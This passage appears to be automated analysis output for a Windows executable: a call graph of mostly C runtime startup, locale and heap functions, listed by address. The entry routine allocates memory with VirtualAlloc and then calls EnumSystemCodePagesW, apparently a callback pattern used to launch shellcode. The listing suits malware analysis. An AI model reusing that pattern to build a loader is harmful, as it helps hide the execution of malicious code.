calls 7425->7427 7426->7425 7429 2eb7ec 7426->7429 7432 2eb7dd 7427->7432 7428 2e1e89 __wcsnicmp_l 9 API calls 7430 2eb7e7 7428->7430 7429->7430 7431 2e1cc3 __chsize_nolock 58 API calls 7429->7431 7430->7389 7430->7390 7431->7432 7432->7428 7434 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7433->7434 7435 2ead60 7434->7435 7436 2ead6d 7435->7436 7437 2ead76 7435->7437 7438 2e1cc3 __chsize_nolock 58 API calls 7436->7438 7440 2ead8b 7437->7440 7443 2ead9f __shift 7437->7443 7439 2ead72 7438->7439 7442 2e1e89 __wcsnicmp_l 9 API calls 7439->7442 7441 2e1cc3 __chsize_nolock 58 API calls 7440->7441 7441->7439 7448 2ead9a _memmove 7442->7448 7444 2eb7bd _$I10_OUTPUT 58 API calls 7443->7444 7445 2eae16 7444->7445 7446 2e1e99 __invoke_watson 8 API calls 7445->7446 7445->7448 7447 2eae9d 7446->7447 7449 2ec11f __fltout2 58 API calls 7447->7449 7448->7346 7450 2eaed0 7449->7450 7451 2eaee7 7450->7451 7452 2eaed7 7450->7452 7454 2eaeee 7451->7454 7455 2eaef8 7451->7455 7453 2e1cc3 __chsize_nolock 58 API calls 7452->7453 7456 2eaedc 7453->7456 7457 2e1cc3 __chsize_nolock 58 API calls 7454->7457 7459 2ebfa7 __fptostr 58 API calls 7455->7459 7458 2e1e89 __wcsnicmp_l 9 API calls 7456->7458 7457->7456 7460 2eaee3 7458->7460 7461 2eaf38 7459->7461 7463 2e5770 ___crt_atoflt_l 6 API calls 7460->7463 7461->7460 7462 2ead4d __cftoe2_l 58 API calls 7461->7462 7462->7460 7464 2eaf68 7463->7464 7464->7346 7466 2eae9e __cftoe_l 58 API calls 7465->7466 7467 2ead48 7466->7467 7467->7365 7468 2eb2a9 7471 2eb2c1 7468->7471 7472 2eb2eb 7471->7472 7473 2eb2d2 7471->7473 7486 2e95d7 7472->7486 7477 2e9549 7473->7477 7476 2eb2bc 7478 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7477->7478 7479 2e956d 7478->7479 7489 2ea184 7479->7489 7484 2e5770 ___crt_atoflt_l 6 API calls 7485 2e95d3 7484->7485 7485->7476 7501 2e94a5 7486->7501 7490 2ea1cc 7489->7490 7496 2ea1dc ___mtold12 7489->7496 7491 2e1cc3 __chsize_nolock 58 API calls 7490->7491 7492 2ea1d1 7491->7492 7493 2e1e89 __wcsnicmp_l 9 API calls 7492->7493 7493->7496 7494 2e5770 ___crt_atoflt_l 6 API calls 7495 2e9585 7494->7495 7497 2e96a0 7495->7497 7496->7494 7500 2e96f8 7497->7500 7498 2e5770 ___crt_atoflt_l 6 API calls 7499 2e9592 7498->7499 7499->7484 7500->7498 7502 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7501->7502 7503 2e94d2 7502->7503 7504 2ea184 ___strgtold12_l 58 API calls 7503->7504 7505 2e94ea 7504->7505 7510 2e9c12 7505->7510 7508 2e5770 ___crt_atoflt_l 6 API calls 7509 2e9545 7508->7509 7509->7476 7513 2e9c6a 7510->7513 7511 2e5770 ___crt_atoflt_l 6 API calls 7512 2e9507 7511->7512 7512->7508 7513->7511 7902 2e1ec9 7903 2e1ed1 7902->7903 7904 2e4869 __calloc_crt 58 API calls 7903->7904 7905 2e1eeb 7904->7905 7906 2e1f04 7905->7906 7907 2e4869 __calloc_crt 58 API calls 7905->7907 7907->7906 7514 2e35a6 7516 2e35b2 _doexit 7514->7516 7515 2e35cb 7518 2e35da 7515->7518 7520 2e4831 _free 58 API calls 7515->7520 7516->7515 7517 2e4831 _free 58 API calls 7516->7517 7519 2e36ba _doexit 7516->7519 7517->7515 7521 2e35e9 7518->7521 7522 2e4831 _free 58 API calls 7518->7522 7520->7518 7523 2e35f8 7521->7523 7525 2e4831 _free 58 API calls 7521->7525 7522->7521 7524 2e3607 7523->7524 7526 2e4831 _free 58 API calls 7523->7526 7527 2e3616 7524->7527 7528 2e4831 _free 58 API calls 7524->7528 7525->7523 7526->7524 7529 2e3625 7527->7529 7530 2e4831 _free 58 API calls 7527->7530 7528->7527 7531 2e3637 7529->7531 7533 2e4831 _free 58 API calls 7529->7533 7530->7529 7532 2e442f __lock 58 API calls 7531->7532 7536 2e363f 7532->7536 7533->7531 7534 2e3662 7546 2e36c6 7534->7546 7536->7534 7538 2e4831 _free 58 API calls 7536->7538 7538->7534 7539 2e442f __lock 58 API calls 7543 2e3676 ___removelocaleref 7539->7543 7542 2e4831 _free 58 API calls 7542->7519 7544 2e715c ___freetlocinfo 58 API calls 7543->7544 7545 2e36a7 7543->7545 7544->7545 7549 2e36d2 7545->7549 7552 2e4599 LeaveCriticalSection 7546->7552 7548 2e366f 7548->7539 7553 2e4599 LeaveCriticalSection 7549->7553 7551 2e36b4 7551->7542 7552->7548 7553->7551 7853 2e16e7 7854 2e16fc 7853->7854 7855 2e16f6 7853->7855 7859 2e17da 7854->7859 7856 2e187c _raise 58 API calls 7855->7856 7856->7854 7858 2e1701 _doexit 7860 2e1932 _doexit 58 API calls 7859->7860 7861 2e17e5 7860->7861 7861->7858 7554 2e9624 7555 2e962c __cfltcvt_init 7554->7555 7556 2e9637 7555->7556 7558 2eb3ca 7555->7558 7564 2ec2af 7558->7564 7560 2eb3dd 7561 2eb3e4 7560->7561 7562 2e1e99 __invoke_watson 8 API calls 7560->7562 7561->7556 7563 2eb3f0 7562->7563 7565 2ec2cb __control87 7564->7565 7569 2ec2eb __control87 7564->7569 7566 2e1cc3 __chsize_nolock 58 API calls 7565->7566 7567 2ec2e1 7566->7567 7568 2e1e89 __wcsnicmp_l 9 API calls 7567->7568 7568->7569 7569->7560 7690 2e4985 7691 2e4988 7690->7691 7694 2e7580 7691->7694 7705 2e49b3 DecodePointer 7694->7705 7696 2e7585 7697 2e7590 7696->7697 7706 2e49dc 7696->7706 7699 2e759a IsProcessorFeaturePresent 7697->7699 7700 2e75b8 7697->7700 7701 2e75a5 7699->7701 7702 2e187c _raise 58 API calls 7700->7702 7703 2e1d2c __call_reportfault 7 API calls 7701->7703 7704 2e75c2 7702->7704 7703->7700 7705->7696 7710 2e49e8 _doexit 7706->7710 7707 2e4a52 7708 2e4a2f DecodePointer 7707->7708 7713 2e4a61 7707->7713 7714 2e4a1e _siglookup 7708->7714 7709 2e4a19 7711 2e36f3 __getptd_noexit 58 API calls 7709->7711 7710->7707 7710->7708 7710->7709 7716 2e4a15 7710->7716 7711->7714 7715 2e1cc3 __chsize_nolock 58 API calls 7713->7715 7718 2e4abf 7714->7718 7720 2e187c _raise 58 API calls 7714->7720 7722 2e4a27 _doexit 7714->7722 7717 2e4a66 7715->7717 7716->7709 7716->7713 7719 2e1e89 __wcsnicmp_l 9 API calls 7717->7719 7721 2e442f __lock 58 API calls 7718->7721 7724 2e4aca 7718->7724 7719->7722 7720->7718 7721->7724 7722->7697 7723 2e4b2c EncodePointer 7726 2e4aff 7723->7726 7724->7723 7724->7726 7727 2e4b5d 7726->7727 7728 2e4b68 7727->7728 7729 2e4b61 7727->7729 7728->7722 7731 2e4599 LeaveCriticalSection 7729->7731 7731->7728 7732 2e3283 IsProcessorFeaturePresent 7733 2e32a9 7732->7733 7734 2eb303 7737 2eb314 7734->7737 7738 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7737->7738 7739 2eb326 7738->7739 7746 2eb791 7739->7746 7741 2eb332 7742 2eb346 7741->7742 7751 2eb623 7741->7751 7744 2eb791 __forcdecpt_l 65 API calls 7742->7744 7745 2eb310 7744->7745 7747 2eb7af 7746->7747 7748 2eb79d 7746->7748 7756 2eb64e 7747->7756 7748->7741 7752 2eb62f 7751->7752 7753 2eb640 7751->7753 7752->7741 7834 2eb5d1 7753->7834 7757 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7756->7757 7758 2eb661 7757->7758 7759 2eb6cd 7758->7759 7760 2eb66d 7758->7760 7761 2eb6eb 7759->7761 7775 2e917b 7759->7775 7767 2eb682 7760->7767 7768 2ec30c 7760->7768 7763 2e1cc3 __chsize_nolock 58 API calls 7761->7763 7765 2eb6f1 7761->7765 7763->7765 7778 2e7917 7765->7778 7767->7741 7769 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7768->7769 7770 2ec31e 7769->7770 7771 2e917b __isleadbyte_l 58 API calls 7770->7771 7774 2ec32b 7770->7774 7772 2ec34f 7771->7772 7783 2e7a55 7772->7783 7774->7767 7776 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7775->7776 7777 2e918c 7776->7777 7777->7761 7779 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7778->7779 7780 2e7928 7779->7780 7805 2e7713 7780->7805 7784 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7783->7784 7785 2e7a66 7784->7785 7788 2e795d 7785->7788 7789 2e7977 7788->7789 7790 2e7984 MultiByteToWideChar 7788->7790 7789->7790 7794 2e79b0 7790->7794 7800 2e79a9 7790->7800 7791 2e5770 ___crt_atoflt_l 6 API calls 7792 2e7a51 7791->7792 7792->7774 7793 2e79d2 _memset __crtGetStringTypeA_stat 7795 2e7a0e MultiByteToWideChar 7793->7795 7793->7800 7794->7793 7796 2e1149 _malloc 58 API calls 7794->7796 7797 2e7a38 7795->7797 7798 2e7a28 GetStringTypeW 7795->7798 7796->7793 7801 2e75c3 7797->7801 7798->7797 7800->7791 7802 2e75de 7801->7802 7803 2e75cd 7801->7803 7802->7800 7803->7802 7804 2e4831 _free 58 API calls 7803->7804 7804->7802 7806 2e772c MultiByteToWideChar 7805->7806 7808 2e778b 7806->7808 7811 2e7792 7806->7811 7809 2e5770 ___crt_atoflt_l 6 API calls 7808->7809 7812 2e7913 7809->7812 7810 2e77f1 MultiByteToWideChar 7813 2e780a 7810->7813 7829 2e7858 7810->7829 7816 2e1149 _malloc 58 API calls 7811->7816 7818 2e77ba __crtGetStringTypeA_stat 7811->7818 7812->7767 7830 2e7659 7813->7830 7815 2e75c3 __crtGetStringTypeA_stat 58 API calls 7815->7808 7816->7818 7817 2e781e 7819 2e7834 7817->7819 7821 2e7860 7817->7821 7817->7829 7818->7808 7818->7810 7820 2e7659 ___crtLCMapStringW LCMapStringW 7819->7820 7819->7829 7820->7829 7822 2e7888 __crtGetStringTypeA_stat 7821->7822 7824 2e1149 _malloc 58 API calls 7821->7824 7823 2e7659 ___crtLCMapStringW LCMapStringW 7822->7823 7822->7829 7827 2e78cb 7823->7827 7824->7822 7825 2e78f3 7826 2e75c3 __crtGetStringTypeA_stat 58 API calls 7825->7826 7826->7829 7827->7825 7828 2e78e5 WideCharToMultiByte 7827->7828 7828->7825 7829->7815 7831 2e7684 ___crtLCMapStringW 7830->7831 7832 2e7669 7830->7832 7833 2e769b LCMapStringW 7831->7833 7832->7817 7833->7817 7835 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7834->7835 7836 2eb5e2 7835->7836 7837 2ec30c __isctype_l 61 API calls 7836->7837 7838 2eb5f9 7836->7838 7837->7838 7838->7741 6050 2e15c0 6051 2e15cc _doexit 6050->6051 6087 2e407f GetStartupInfoW 6051->6087 6054 2e15d1 6089 2e1d17 GetProcessHeap 6054->6089 6055 2e1629 6056 2e1634 6055->6056 6169 2e1710 6055->6169 6090 2e3815 6056->6090 6059 2e163a 6060 2e1645 __RTC_Initialize 6059->6060 6061 2e1710 _fast_error_exit 58 API calls 6059->6061 6111 2e38a8 6060->6111 6061->6060 6063 2e1654 6064 2e1660 GetCommandLineW 6063->6064 6066 2e1710 _fast_error_exit 58 API calls 6063->6066 6130 2e3fa4 GetEnvironmentStringsW 6064->6130 6068 2e165f 6066->6068 6068->6064 6070 2e167a 6071 2e1685 6070->6071 6177 2e17be 6070->6177 6140 2e3d99 6071->6140 6074 2e168b 6075 2e1696 6074->6075 6076 2e17be __lock 58 API calls 6074->6076 6154 2e17f8 6075->6154 6076->6075 6078 2e169e 6079 2e16a9 __wwincmdln 6078->6079 6080 2e17be __lock 58 API calls 6078->6080 6160 2e1000 6079->6160 6080->6079 6083 2e16cc 6187 2e17e9 6083->6187 6086 2e16d1 _doexit 6088 2e4095 6087->6088 6088->6054 6089->6055 6190 2e1890 RtlEncodePointer 6090->6190 6092 2e381a 6196 2e4560 6092->6196 6095 2e3823 6200 2e388b 6095->6200 6100 2e3840 6212 2e4869 6100->6212 6103 2e3882 6105 2e388b __mtterm 61 API calls 6103->6105 6107 2e3887 6105->6107 6106 2e3861 6106->6103 6108 2e3867 6106->6108 6107->6059 6221 2e3762 6108->6221 6110 2e386f GetCurrentThreadId 6110->6059 6112 2e38b4 _doexit 6111->6112 6113 2e442f __lock 58 API calls 6112->6113 6114 2e38bb 6113->6114 6115 2e4869 __calloc_crt 58 API calls 6114->6115 6116 2e38cc 6115->6116 6117 2e3937 GetStartupInfoW 6116->6117 6118 2e38d7 _doexit @_EH4_CallFilterFunc@8 6116->6118 6124 2e394c 6117->6124 6125 2e3a7b 6117->6125 6118->6063 6119 2e3b43 6485 2e3b53 6119->6485 6121 2e4869 __calloc_crt 58 API calls 6121->6124 6122 2e3ac8 GetStdHandle 6122->6125 6123 2e3adb GetFileType 6123->6125 6124->6121 6124->6125 6127 2e399a 6124->6127 6125->6119 6125->6122 6125->6123 6129 2e40a2 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6125->6129 6126 2e39ce GetFileType 6126->6127 6127->6125 6127->6126 6128 2e40a2 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6127->6128 6128->6127 6129->6125 6131 2e1670 6130->6131 6132 2e3fb5 6130->6132 6136 2e3b5c GetModuleFileNameW 6131->6136 6133 2e48b1 __malloc_crt 58 API calls 6132->6133 6134 2e3fdb _memmove 6133->6134 6135 2e3ff1 FreeEnvironmentStringsW 6134->6135 6135->6131 6137 2e3b90 _wparse_cmdline 6136->6137 6138 2e48b1 __malloc_crt 58 API calls 6137->6138 6139 2e3bd0 _wparse_cmdline 6137->6139 6138->6139 6139->6070 6141 2e3db2 __NMSG_WRITE 6140->6141 6145 2e3daa 6140->6145 6142 2e4869 __calloc_crt 58 API calls 6141->6142 6143 2e3ddb __NMSG_WRITE 6142->6143 6143->6145 6146 2e4869 __calloc_crt 58 API calls 6143->6146 6147 2e3e32 6143->6147 6148 2e3e57 6143->6148 6150 2e5457 __NMSG_WRITE 58 API calls 6143->6150 6151 2e3e6e 6143->6151 6144 2e4831 _free 58 API calls 6144->6145 6145->6074 6146->6143 6147->6144 6149 2e4831 _free 58 API calls 6148->6149 6149->6145 6150->6143 6152 2e1e99 __invoke_watson 8 API calls 6151->6152 6153 2e3e7a 6152->6153 6153->6074 6155 2e1804 __IsNonwritableInCurrentImage 6154->6155 6489 2e4942 6155->6489 6157 2e1822 __initterm_e 6159 2e1841 _doexit __IsNonwritableInCurrentImage 6157->6159 6492 2e481c 6157->6492 6159->6078 6161 2e1149 _malloc 58 API calls 6160->6161 6162 2e1013 6161->6162 6558 2e11db 6162->6558 6166 2e1086 6166->6083 6184 2e1a61 6166->6184 6167 2e104d _memset 6167->6166 6168 2e107d EnumSystemCodePagesW 6167->6168 6168->6166 6170 2e171c 6169->6170 6171 2e1721 6169->6171 6172 2e1a75 __FF_MSGBANNER 58 API calls 6170->6172 6173 2e1ad2 __NMSG_WRITE 58 API calls 6171->6173 6172->6171 6174 2e1729 6173->6174 6175 2e17a8 _doexit 3 API calls 6174->6175 6176 2e1733 6175->6176 6176->6056 6178 2e1a75 __FF_MSGBANNER 58 API calls 6177->6178 6179 2e17c6 6178->6179 6180 2e1ad2 __NMSG_WRITE 58 API calls 6179->6180 6181 2e17ce 6180->6181 7265 2e187c 6181->7265 6185 2e1932 _doexit 58 API calls 6184->6185 6186 2e1a70 6185->6186 6186->6083 6188 2e1932 _doexit 58 API calls 6187->6188 6189 2e17f4 6188->6189 6189->6086 6231 2e1767 6190->6231 6192 2e18a1 __init_pointers __initp_misc_winsig 6232 2e4995 EncodePointer 6192->6232 6194 2e18b9 __init_pointers 6195 2e4110 34 API calls 6194->6195 6195->6092 6197 2e456c 6196->6197 6199 2e381f 6197->6199 6233 2e40a2 6197->6233 6199->6095 6209 2e4001 6199->6209 6201 2e3895 6200->6201 6203 2e389b 6200->6203 6236 2e401f 6201->6236 6204 2e4479 DeleteCriticalSection 6203->6204 6205 2e4495 6203->6205 6239 2e4831 6204->6239 6207 2e44a1 DeleteCriticalSection 6205->6207 6208 2e3828 6205->6208 6207->6205 6208->6059 6210 2e4018 TlsAlloc 6209->6210 6211 2e3835 6209->6211 6211->6095 6211->6100 6215 2e4870 6212->6215 6214 2e384d 6214->6103 6218 2e405d 6214->6218 6215->6214 6217 2e488e 6215->6217 6265 2e74fd 6215->6265 6217->6214 6217->6215 6273 2e43a9 Sleep 6217->6273 6219 2e4077 TlsSetValue 6218->6219 6220 2e4073 6218->6220 6219->6106 6220->6106 6222 2e376e _doexit 6221->6222 6276 2e442f 6222->6276 6224 2e37ab 6283 2e3803 6224->6283 6227 2e442f __lock 58 API calls 6228 2e37cc ___addlocaleref 6227->6228 6286 2e380c 6228->6286 6230 2e37f7 _doexit 6230->6110 6231->6192 6232->6194 6234 2e40bf InitializeCriticalSectionAndSpinCount 6233->6234 6235 2e40b2 6233->6235 6234->6197 6235->6197 6237 2e4036 TlsFree 6236->6237 6238 2e4032 6236->6238 6237->6203 6238->6203 6240 2e483a HeapFree 6239->6240 6241 2e4863 __dosmaperr 6239->6241 6240->6241 6242 2e484f 6240->6242 6241->6203 6245 2e1cc3 6242->6245 6248 2e36f3 GetLastError 6245->6248 6247 2e1cc8 GetLastError 6247->6241 6262 2e403e 6248->6262 6250 2e3708 6251 2e3756 SetLastError 6250->6251 6252 2e4869 __calloc_crt 55 API calls 6250->6252 6251->6247 6253 2e371b 6252->6253 6253->6251 6254 2e405d __getptd_noexit TlsSetValue 6253->6254 6255 2e372f 6254->6255 6256 2e374d 6255->6256 6257 2e3735 6255->6257 6258 2e4831 _free 55 API calls 6256->6258 6259 2e3762 __initptd 55 API calls 6257->6259 6261 2e3753 6258->6261 6260 2e373d GetCurrentThreadId 6259->6260 6260->6251 6261->6251 6263 2e4055 TlsGetValue 6262->6263 6264 2e4051 6262->6264 6263->6250 6264->6250 6266 2e7508 6265->6266 6271 2e7523 6265->6271 6267 2e7514 6266->6267 6266->6271 6268 2e1cc3 __chsize_nolock 57 API calls 6267->6268 6272 2e7519 6268->6272 6269 2e7533 HeapAlloc 6269->6271 6269->6272 6271->6269 6271->6272 6274 2e1741 DecodePointer 6271->6274 6272->6215 6273->6217 6275 2e1754 6274->6275 6275->6271 6277 2e4453 EnterCriticalSection 6276->6277 6278 2e4440 6276->6278 6277->6224 6289 2e44b7 6278->6289 6280 2e4446 6280->6277 6281 2e17be __lock 57 API calls 6280->6281 6282 2e4452 6281->6282 6282->6277 6483 2e4599 LeaveCriticalSection 6283->6483 6285 2e37c5 6285->6227 6484 2e4599 LeaveCriticalSection 6286->6484 6288 2e3813 6288->6230 6290 2e44c3 _doexit 6289->6290 6291 2e44cc 6290->6291 6292 2e44e4 6290->6292 6313 2e1a75 6291->6313 6295 2e4505 _doexit 6292->6295 6355 2e48b1 6292->6355 6295->6280 6300 2e450f 6304 2e442f __lock 58 API calls 6300->6304 6301 2e4500 6303 2e1cc3 __chsize_nolock 58 API calls 6301->6303 6303->6295 6306 2e4516 6304->6306 6307 2e453b 6306->6307 6308 2e4523 6306->6308 6309 2e4831 _free 58 API calls 6307->6309 6310 2e40a2 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6308->6310 6311 2e452f 6309->6311 6310->6311 6361 2e4557 6311->6361 6364 2e3e88 6313->6364 6315 2e1a7c 6316 2e1a89 6315->6316 6318 2e3e88 __FF_MSGBANNER 58 API calls 6315->6318 6317 2e1ad2 __NMSG_WRITE 58 API calls 6316->6317 6321 2e1aab 6316->6321 6319 2e1aa1 6317->6319 6318->6316 6320 2e1ad2 __NMSG_WRITE 58 API calls 6319->6320 6320->6321 6322 2e1ad2 6321->6322 6323 2e1af0 __NMSG_WRITE 6322->6323 6324 2e1c17 6323->6324 6326 2e3e88 __FF_MSGBANNER 55 API calls 6323->6326 6446 2e5770 6324->6446 6328 2e1b03 6326->6328 6327 2e1c80 6352 2e17a8 6327->6352 6329 2e1c1c GetStdHandle 6328->6329 6330 2e3e88 __FF_MSGBANNER 55 API calls 6328->6330 6329->6324 6333 2e1c2a _strlen 6329->6333 6331 2e1b14 6330->6331 6331->6329 6332 2e1b26 6331->6332 6332->6324 6394 2e5457 6332->6394 6333->6324 6336 2e1c63 WriteFile 6333->6336 6336->6324 6337 2e1c84 6340 2e1e99 __invoke_watson 8 API calls 6337->6340 6338 2e1b53 GetModuleFileNameW 6339 2e1b73 6338->6339 6343 2e1b83 __NMSG_WRITE 6338->6343 6341 2e5457 __NMSG_WRITE 55 API calls 6339->6341 6342 2e1c8e 6340->6342 6341->6343 6343->6337 6344 2e1bc9 6343->6344 6403 2e54cc 6343->6403 6344->6337 6412 2e53eb 6344->6412 6348 2e53eb __NMSG_WRITE 55 API calls 6349 2e1c00 6348->6349 6349->6337 6350 2e1c07 6349->6350 6421 2e558a EncodePointer 6350->6421 6461 2e1774 GetModuleHandleExW 6352->6461 6356 2e48bf 6355->6356 6358 2e44f9 6356->6358 6360 2e48d2 6356->6360 6464 2e1149 6356->6464 6358->6300 6358->6301 6360->6356 6360->6358 6481 2e43a9 Sleep 6360->6481 6482 2e4599 LeaveCriticalSection 6361->6482 6363 2e455e 6363->6295 6365 2e3e92 6364->6365 6366 2e3e9c 6365->6366 6367 2e1cc3 __chsize_nolock 58 API calls 6365->6367 6366->6315 6368 2e3eb8 6367->6368 6371 2e1e89 6368->6371 6374 2e1e5e DecodePointer 6371->6374 6375 2e1e71 6374->6375 6380 2e1e99 IsProcessorFeaturePresent 6375->6380 6378 2e1e5e __wcsnicmp_l 8 API calls 6379 2e1e95 6378->6379 6379->6315 6381 2e1ea4 6380->6381 6386 2e1d2c 6381->6386 6385 2e1e88 6385->6378 6387 2e1d46 _memset __call_reportfault 6386->6387 6388 2e1d66 IsDebuggerPresent 6387->6388 6389 2e43cc __call_reportfault SetUnhandledExceptionFilter UnhandledExceptionFilter 6388->6389 6392 2e1e2a __call_reportfault 6389->6392 6390 2e5770 ___crt_atoflt_l 6 API calls 6391 2e1e4d 6390->6391 6393 2e43b7 GetCurrentProcess TerminateProcess 6391->6393 6392->6390 6393->6385 6395 2e5470 6394->6395 6396 2e5462 6394->6396 6397 2e1cc3 __chsize_nolock 58 API calls 6395->6397 6396->6395 6398 2e5489 6396->6398 6402 2e547a 6397->6402 6400 2e1b46 6398->6400 6401 2e1cc3 __chsize_nolock 58 API calls 6398->6401 6399 2e1e89 __wcsnicmp_l 9 API calls 6399->6400 6400->6337 6400->6338 6401->6402 6402->6399 6407 2e54da 6403->6407 6404 2e54de 6405 2e54e3 6404->6405 6406 2e1cc3 __chsize_nolock 58 API calls 6404->6406 6405->6344 6408 2e550e 6406->6408 6407->6404 6407->6405 6410 2e551d 6407->6410 6409 2e1e89 __wcsnicmp_l 9 API calls 6408->6409 6409->6405 6410->6405 6411 2e1cc3 __chsize_nolock 58 API calls 6410->6411 6411->6408 6414 2e53f7 6412->6414 6415 2e5405 6412->6415 6413 2e1cc3 __chsize_nolock 58 API calls 6416 2e540f 6413->6416 6414->6415 6419 2e5431 6414->6419 6415->6413 6417 2e1e89 __wcsnicmp_l 9 API calls 6416->6417 6418 2e1be9 6417->6418 6418->6337 6418->6348 6419->6418 6420 2e1cc3 __chsize_nolock 58 API calls 6419->6420 6420->6416 6422 2e55be ___crtIsPackagedApp 6421->6422 6423 2e567d IsDebuggerPresent 6422->6423 6424 2e55cd LoadLibraryExW 6422->6424 6427 2e5687 6423->6427 6428 2e56a2 6423->6428 6425 2e560a GetProcAddress 6424->6425 6426 2e55e4 GetLastError 6424->6426 6433 2e561e 7 API calls 6425->6433 6434 2e569a 6425->6434 6432 2e55f3 LoadLibraryExW 6426->6432 6426->6434 6429 2e568e OutputDebugStringW 6427->6429 6430 2e5695 6427->6430 6428->6430 6431 2e56a7 DecodePointer 6428->6431 6429->6430 6430->6434 6435 2e56e6 6430->6435 6440 2e56ce DecodePointer DecodePointer 6430->6440 6431->6434 6432->6425 6432->6434 6436 2e567a 6433->6436 6437 2e5666 GetProcAddress EncodePointer 6433->6437 6438 2e5770 ___crt_atoflt_l 6 API calls 6434->6438 6439 2e571e DecodePointer 6435->6439 6445 2e570a DecodePointer 6435->6445 6436->6423 6437->6436 6441 2e576c 6438->6441 6442 2e5725 6439->6442 6439->6445 6440->6435 6441->6324 6444 2e5736 DecodePointer 6442->6444 6442->6445 6444->6445 6445->6434 6447 2e577a IsProcessorFeaturePresent 6446->6447 6448 2e5778 6446->6448 6450 2e7ae6 6447->6450 6448->6327 6453 2e7a95 IsDebuggerPresent 6450->6453 6454 2e7aaa __call_reportfault 6453->6454 6459 2e43cc SetUnhandledExceptionFilter UnhandledExceptionFilter 6454->6459 6456 2e7ab2 __call_reportfault 6460 2e43b7 GetCurrentProcess TerminateProcess 6456->6460 6458 2e7acf 6458->6327 6459->6456 6460->6458 6462 2e178d GetProcAddress 6461->6462 6463 2e179f ExitProcess 6461->6463 6462->6463 6465 2e11c4 6464->6465 6469 2e1155 6464->6469 6466 2e1741 __calloc_impl DecodePointer 6465->6466 6467 2e11ca 6466->6467 6470 2e1cc3 __chsize_nolock 57 API calls 6467->6470 6468 2e1160 6468->6469 6471 2e1a75 __FF_MSGBANNER 57 API calls 6468->6471 6474 2e1ad2 __NMSG_WRITE 57 API calls 6468->6474 6478 2e17a8 _doexit 3 API calls 6468->6478 6469->6468 6472 2e1188 RtlAllocateHeap 6469->6472 6475 2e11b0 6469->6475 6476 2e1741 __calloc_impl DecodePointer 6469->6476 6479 2e11ae 6469->6479 6473 2e11bc 6470->6473 6471->6468 6472->6469 6472->6473 6473->6356 6474->6468 6477 2e1cc3 __chsize_nolock 57 API calls 6475->6477 6476->6469 6477->6479 6478->6468 6480 2e1cc3 __chsize_nolock 57 API calls 6479->6480 6480->6473 6481->6360 6482->6363 6483->6285 6484->6288 6488 2e4599 LeaveCriticalSection 6485->6488 6487 2e3b5a 6487->6118 6488->6487 6490 2e4945 EncodePointer 6489->6490 6490->6490 6491 2e495f 6490->6491 6491->6157 6495 2e4720 6492->6495 6494 2e4827 6494->6159 6496 2e472c _doexit 6495->6496 6503 2e1920 6496->6503 6502 2e4753 _doexit 6502->6494 6504 2e442f __lock 58 API calls 6503->6504 6505 2e1927 6504->6505 6506 2e4764 DecodePointer DecodePointer 6505->6506 6507 2e4741 6506->6507 6508 2e4791 6506->6508 6517 2e475e 6507->6517 6508->6507 6520 2e7421 6508->6520 6510 2e47f4 EncodePointer EncodePointer 6510->6507 6511 2e47c8 6511->6507 6514 2e48f8 __realloc_crt 61 API calls 6511->6514 6516 2e47e2 EncodePointer 6511->6516 6512 2e47a3 6512->6510 6512->6511 6527 2e48f8 6512->6527 6515 2e47dc 6514->6515 6515->6507 6515->6516 6516->6510 6554 2e1929 6517->6554 6521 2e743f HeapSize 6520->6521 6522 2e742a 6520->6522 6521->6512 6523 2e1cc3 __chsize_nolock 58 API calls 6522->6523 6524 2e742f 6523->6524 6525 2e1e89 __wcsnicmp_l 9 API calls 6524->6525 6526 2e743a 6525->6526 6526->6512 6530 2e48ff 6527->6530 6529 2e493c 6529->6511 6530->6529 6532 2e7452 6530->6532 6553 2e43a9 Sleep 6530->6553 6533 2e745b 6532->6533 6534 2e7466 6532->6534 6535 2e1149 _malloc 58 API calls 6533->6535 6536 2e746e 6534->6536 6542 2e747b 6534->6542 6537 2e7463 6535->6537 6538 2e4831 _free 58 API calls 6536->6538 6537->6530 6552 2e7476 __dosmaperr 6538->6552 6539 2e74b3 6540 2e1741 __calloc_impl DecodePointer 6539->6540 6543 2e74b9 6540->6543 6541 2e7483 HeapReAlloc 6541->6542 6541->6552 6542->6539 6542->6541 6544 2e74e3 6542->6544 6546 2e1741 __calloc_impl DecodePointer 6542->6546 6549 2e74cb 6542->6549 6545 2e1cc3 __chsize_nolock 58 API calls 6543->6545 6547 2e1cc3 __chsize_nolock 58 API calls 6544->6547 6545->6552 6546->6542 6548 2e74e8 GetLastError 6547->6548 6548->6552 6550 2e1cc3 __chsize_nolock 58 API calls 6549->6550 6551 2e74d0 GetLastError 6550->6551 6551->6552 6552->6530 6553->6530 6557 2e4599 LeaveCriticalSection 6554->6557 6556 2e1930 6556->6502 6557->6556 6564 2e11f0 6558->6564 6560 2e1025 VirtualAlloc 6561 2e147f 6560->6561 7080 2e149a 6561->7080 6563 2e1495 6563->6167 6566 2e11fc _doexit 6564->6566 6565 2e120f 6567 2e1cc3 __chsize_nolock 58 API calls 6565->6567 6566->6565 6568 2e1240 6566->6568 6569 2e1214 6567->6569 6583 2e2034 6568->6583 6571 2e1e89 __wcsnicmp_l 9 API calls 6569->6571 6578 2e121f _doexit @_EH4_CallFilterFunc@8 6571->6578 6572 2e1245 6573 2e124e 6572->6573 6574 2e125b 6572->6574 6575 2e1cc3 __chsize_nolock 58 API calls 6573->6575 6576 2e1285 6574->6576 6577 2e1265 6574->6577 6575->6578 6598 2e2153 6576->6598 6579 2e1cc3 __chsize_nolock 58 API calls 6577->6579 6578->6560 6579->6578 6584 2e2040 _doexit 6583->6584 6585 2e442f __lock 58 API calls 6584->6585 6591 2e204e 6585->6591 6586 2e20c9 6588 2e48b1 __malloc_crt 58 API calls 6586->6588 6590 2e20d0 6588->6590 6589 2e213f _doexit 6589->6572 6593 2e40a2 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6590->6593 6596 2e20c2 6590->6596 